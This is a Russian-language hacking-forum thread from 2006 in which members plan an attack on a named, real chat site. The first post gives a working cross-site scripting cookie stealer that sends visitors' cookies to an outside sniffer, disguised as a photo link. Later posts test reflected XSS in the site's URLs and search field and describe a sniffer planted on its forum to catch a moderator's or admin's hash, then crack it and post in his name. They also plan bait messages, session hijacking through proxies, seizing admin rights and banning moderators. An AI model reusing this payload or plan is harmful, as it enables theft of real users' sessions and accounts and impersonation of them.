Чаты проверьте чат на уязвимость

Discussion in 'Веб-уязвимости' started by ruh, 8 May 2006.

  1. ruh

    ruh New Member

    Joined:
    8 May 2006
    Messages:
    19
    Likes Received:
    1
    Reputations:
    0
    т.е. можно вот эту ссылку
    <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
    вставить в строку куда надо вводить адрес фотки, а место s.jpg написать реальный адрес фотки и звать всех заценить мою фотку

    что делать с
    http://chat.scn.ru/index.php?session=366b076ea4992e9fb9403f1a4794296a &go=<script>alert('XSS')</script>
     
  2. ruh

    ruh New Member

    Joined:
    8 May 2006
    Messages:
    19
    Likes Received:
    1
    Reputations:
    0
    куда ты вводил адрес снифера
    чет я сним совсем запутался
     
  3. ruh

    ruh New Member

    Joined:
    8 May 2006
    Messages:
    19
    Likes Received:
    1
    Reputations:
    0
    если снифер выдает хэши => можно писать от друголи лица, проверьте это в этом чате
     
  4. Антошка2003

    Антошка2003 Elder - Старейшина

    Joined:
    3 Apr 2005
    Messages:
    534
    Likes Received:
    66
    Reputations:
    49
    адресс сниффера я вводил в форум. теперь сижу и жду когда либо этот модер, либо админ откроет сообщение и тогда мне придёт его хэш.
    если расшифруем хэш, то получим пароль, авторизировавшись логином владельца хэша, мы с можем писать от его лица.
     
    #24 Антошка2003, 9 May 2006
    Last edited: 9 May 2006
    1 person likes this.
  5. ruh

    ruh New Member

    Joined:
    8 May 2006
    Messages:
    19
    Likes Received:
    1
    Reputations:
    0
    постой куда именно и как ты вводил сниф в форуме и куда и как его вводить в чате из статьи я этого не понял

    а нельзя просто скопировать форму отправки сообщений и свой хэш заменить на его, и отправлять сообщения неавторизовавшись

    может просто сказать в чате что в форуме замутил клевую тему (якобы зацените)
     
  6. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Антошка2003, если не в лом, проверь алерт.. у меня некоторые подозрения насчёт него..
    _http://chat.scn.ru/index.php?session=366b076ea4992e9fb9403f1a4794296a&go=<script>alert('XSS')</script>
    Долго хэши ждать прийдётся)
     
  7. Антошка2003

    Антошка2003 Elder - Старейшина

    Joined:
    3 Apr 2005
    Messages:
    534
    Likes Received:
    66
    Reputations:
    49
    как вставлять в фрум читай здесь - http://www.forum.antichat.ru/thread12610.html
    в чате на каждый вход даёться разная сессия, если авторизироваться его сессией, то может что то и выйдет. как сессию перехватывать смотри этот раздел, была тема о взломе вуду чатов.
    попробуй скажи что замутили клёвую тему.

    я попозже попробую с алертами, сейчас не могу пока что. но так кажется что он ничего не даст, но нужно посмотреть, может как и можно будет применить.
     
    #27 Антошка2003, 9 May 2006
    Last edited: 9 May 2006
  8. ruh

    ruh New Member

    Joined:
    8 May 2006
    Messages:
    19
    Likes Received:
    1
    Reputations:
    0
     
  9. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    ruh, ясн..
    Оффтопик:
    Rayden отключил меня на неделю, причина: наш чат не ломается
    лол)
     
  10. ruh

    ruh New Member

    Joined:
    8 May 2006
    Messages:
    19
    Likes Received:
    1
    Reputations:
    0
    опечатка:
    часто бывает
     
  11. ruh

    ruh New Member

    Joined:
    8 May 2006
    Messages:
    19
    Likes Received:
    1
    Reputations:
    0


    как он тебя спалил
     
  12. ruh

    ruh New Member

    Joined:
    8 May 2006
    Messages:
    19
    Likes Received:
    1
    Reputations:
    0
    подведем итоги:
     
  13. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Я носки не стал менять, вот и спалил)
     
  14. ruh

    ruh New Member

    Joined:
    8 May 2006
    Messages:
    19
    Likes Received:
    1
    Reputations:
    0
    я серьезно


    и почему на счет аплета ответ был учим, а не учи
     
  15. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Я тоже йопт) Нафлудили 4 страницы...(
    Носки=прокси.. ясно?)
    1. аЛЕРт
    2. жжош, не придирайся к словам) а то тему нахъ закроют за непомерный флуд
     
  16. ruh

    ruh New Member

    Joined:
    8 May 2006
    Messages:
    19
    Likes Received:
    1
    Reputations:
    0
    так какой вывод по чату в общем:
    1. получить права админа(модератора)
    2. забанить модератора
    3. что мне может дать та ссылка с xss
     
  17. ruh

    ruh New Member

    Joined:
    8 May 2006
    Messages:
    19
    Likes Received:
    1
    Reputations:
    0
    4. можно ли в этом чате читать приваты
     
  18. ruh

    ruh New Member

    Joined:
    8 May 2006
    Messages:
    19
    Likes Received:
    1
    Reputations:
    0
    ваше мнение и общие выводы по этому чату

    согласны ли вы с Rayden по поводу не возможности взлома данного чата
     
    #38 ruh, 9 May 2006
    Last edited: 9 May 2006
    1 person likes this.
  19. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Йопт, чат ломают не молотком..
    Антошка2003, залил сниффер на форум, прийдут хэши, тогда и видно будет..
    Потерпи немного, не на пожар..
     
  20. Tem

    Tem -

    Joined:
    5 Oct 2005
    Messages:
    557
    Likes Received:
    157
    Reputations:
    179
    Так ребята я только что заметил тему прошолся по чату , тама ешё в чате есть КСС , боковой фрейм где ники, внезу (Фотографии),открываем и видем напись (Введите текст для поиска или ник:), ставим <script>alert()</script>, вылетает алерт, можна и им воспользоватся.
     
    1 person likes this.